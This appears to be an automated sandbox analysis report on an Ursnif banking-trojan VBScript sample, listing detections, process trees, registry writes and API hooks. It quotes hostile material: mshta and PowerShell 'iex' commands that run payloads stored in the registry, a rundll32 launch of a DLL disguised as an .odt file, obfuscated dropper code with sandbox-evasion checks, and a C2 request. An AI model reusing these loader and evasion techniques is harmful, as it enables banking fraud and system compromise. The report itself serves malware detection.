            Source: unknownHTTP traffic detected: POST /x7RHILsUu13RNWdAgcyIG/qtXPZ5mShxWyId8A/aqzFvUR1vpmX8Up/q_2B2EdTfKMNCz0qxF/_2FPDHq0L/LUAKCoi5Kv4k92FCS9c4/5pNcQF7C6KYMZBsUSDt/KFidT5iQrYQJ8LRP_2FoLY/f_2B88YT7woyk/KKJVXmPv/vF_2FE_2Fvc1X20QJ8r0Wn_/2BzNsjc_2F/YMdyw7a8HJLKOf2JR/adM5VRnv5AOV/eVROMbVITYu/4QdgxMF4kpaBK6/UL3JxZ6B_2FLQEdWMX_2B/oDqnX_2BCDatYw9I/KVGr3LtJ92s34dn/eT_2Bba67PTBBLkoO/1xww0J HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at
            Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000025.00000002.732660461.000001D681EC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_04444CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

            System Summary:

            barindex
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E192C NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E1E74 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E12CE NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E2495 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_044425E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_04448055 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E2274
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_04447E30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_04446680
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_0444175B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_70322400
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_7030A1AC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_703263D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_703055C0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_703047E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 702FA3B0 appears 34 times
            Source: v8MaHZpVOY2L.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: classification engineClassification label: mal100.troj.evad.winVBS@14/8@6/1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_04446244 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210802Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
            Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
            Source: v8MaHZpVOY2L.vbsVirustotal: Detection: 34%
            Source: v8MaHZpVOY2L.vbsReversingLabs: Detection: 13%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs'
            Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
            Source: unknownProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
            Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: v8MaHZpVOY2L.vbsStatic file information: File size 2145907 > 1048576
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdbXP@L source: powershell.exe, 00000025.00000002.750257715.000001D6861CE000.00000004.00000001.sdmp
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000027.00000002.731260483.0000015F83160000.00000002.00000001.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdb8 source: powershell.exe, 00000025.00000002.750151124.000001D68618E000.00000004.00000001.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdb source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp
            Source: Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: wscript.exe, 00000002.00000003.406245520.00000294B943D000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.736255174.0000000070329000.00000002.00020000.sdmp, beneficial.odt.2.dr
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdbXP@L source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell")Rastus = redden.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\" + "30226" + ".txt"If WScript.CreateObject("Scripting.FileSystemObject").FileExists(Rastus) ThenJason = (258 - ((954 - 688.0) - (51 + (-43.0))))ElseREM export Schwartz pellet Josephus prophesy probabilist Medford transcript Indoeuropean, 6902325 midwives bazaar origin faceplate oersted dividend monologue furthermore Westminster, 2587295 gyrocompass capstone Jason = (((39 + 29.0) + (46 + 282.0)) - 395.0)End Ifforborne = JasonREM guarantee Paraguayan strand, fogy reap Zeiss broad penal provision sociometry Fresno remembrance condolence Philistine41 wall status dock End FunctionFunction minus()GxzLW("DEBUG: FS_FCC - Start")' octave rhododendron intuition. sac pediment. tail telescopic syringe aggravate wallet Lyon too on error resume next' Atlantis boulder phrasemake feed wardrobe. schlieren trainman maldistribute hindsight pentecostal Bodleian bedroom Nippon stoppage deflect, Set wdhWF = GetObject("winmgmts:\\.\root\cimv2")Set MDQ = wdhWF.ExecQuery("Select * from Win32_Processor", , (607 - (567 - ((88 + (-13.0)) + (-67.0)))))For Each giantess In MDQIf giantess.NumberOfCores < (((68 + 1.0) - 14.0) + (-(4146 - 4094.0))) Thenfossiliferous = TrueREM trouser Indiana whee, cotman knockout screenful Marriott Miles Rothschild lingual southpaw sportswriting torque. Lebesgue imperate decree Israelite duress megabyte GxzLW("DEBUG: FS_FCC - False")End IfREM rangy share humpty z conundrum. binocular Howell Worcestershire inferno ionosphere inferno370 phi mobcap corrigible downwind expression NextIf fossiliferous ThenOSWmEnd IfREM gestation average poverty saturater met longue. Pericles eohippus Aug impose, desist demurring stream594 withheld expound Eastman GxzLW("DEBUG: FS_FCC - True")REM Doherty Goodman wart smug oppressive, paraboloid stifle assiduous gummy. material quest revelry End FunctionFunction guerrilla()GxzLW("DEBUG: FS_CM - Start")on error resume next' bug famish batik antennae afforest112 cherubim browbeaten pidgin Fujitsu midband. barbarism jot Harbin sod Dim qjbJl,sturgeonqjbJl=6000sturgeon=3000RandomizeWScript.Sleep Int((qjbJl-sturgeon+1)*Rnd+sturgeon)Set wdhWF = GetObject("winmgmts:\\.\root\cimv2")Set MDQ = wdhWF.ExecQuery("Select * from Win32_ComputerSystem")' none slice cowpox summertime camelback testicular ogle lumen, marketplace grail caramel believe For Each giantess In MDQFOC = FOC + Int((giantess.TotalPhysicalMemory) / (1048865 - ((3614 - 2.0) - (3356 - 33.0))))NextIf FOC < (98 + ((1314 - (73 + 252.0)) - 57.0)) ThenGxzLW("DEBUG: FS_CM - False")REM Sousa Peloponnese curmudgeon joke Benson Auckland desideratum draw Cornwall ghastly gavotte, invidious, direct OSWmEnd IfGxzLW("DEBUG: FS_CM - True")End FunctionFunction gGXl()REM hat runt ultimatum physician maul. slang parliament Albert pyridine. 5714460 postoperative libertine scholastic nothing421 plethora Mycenaean flunk peaceable oriental GxzLW("DEBUG: FS_TD1 - Start")GxzLW("DEBUG: FS_TD2 - Start"
            Suspicious powershell command line foundShow sources
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E1D62 LoadLibraryA,GetProcAddress,
            Source: beneficial.odt.2.drStatic PE information: real checksum: 0xadda3 should be: 0xa6e2d
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E2210 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E2263 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_04447E1F push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_04447AB0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_0444B1DE push esp; iretd

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\beneficial.odtJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\beneficial.odtJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\v8mahzpvoy2l.vbsJump to behavior
            Hooks registry keys query functions (used to hide registry keys)Show sources
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
            Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
            Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
            Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeKey value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDateJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
